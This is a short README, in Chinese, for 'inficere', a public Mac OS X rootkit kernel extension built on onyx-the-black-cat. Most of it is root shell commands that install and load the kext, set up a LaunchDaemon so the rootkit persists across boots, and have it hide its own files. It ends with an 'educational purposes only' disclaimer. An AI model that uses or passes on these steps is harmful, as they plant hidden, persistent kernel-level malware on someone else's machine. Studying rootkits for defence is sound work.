基于 fractalG 的 onyx-the-black-cat(https://github.com/gdbinit/onyx-the-black-cat)构建的 Mac OS X rootkit 公开版本
仅在 Mountain Lion 10.8.2 至 10.8.5 上测试过。不保证在其他版本上能正常工作。
# chmod -R 755 inficere.kext# chown -R root:wheel inficere.kext# mv inficere.kext /System/Library/Extensions/# kextutil /System/Library/Extensions/inficere.kext# ./control如需开机持久化:
# plutil -convert binary1 com.enzo.inficere.plist# mv com.enzo.inficere.plist /Library/LaunchDaemons/com.enzo.inficere.plist# chown root:wheel /Library/LaunchDaemons/com.enzo.inficere.plist# launchctl load -w /Library/LaunchDaemons/com.enzo.inficere.plist加载后,Inficere 会隐藏上述文件。
我想强调的是,制作此工具仅用于教育目的。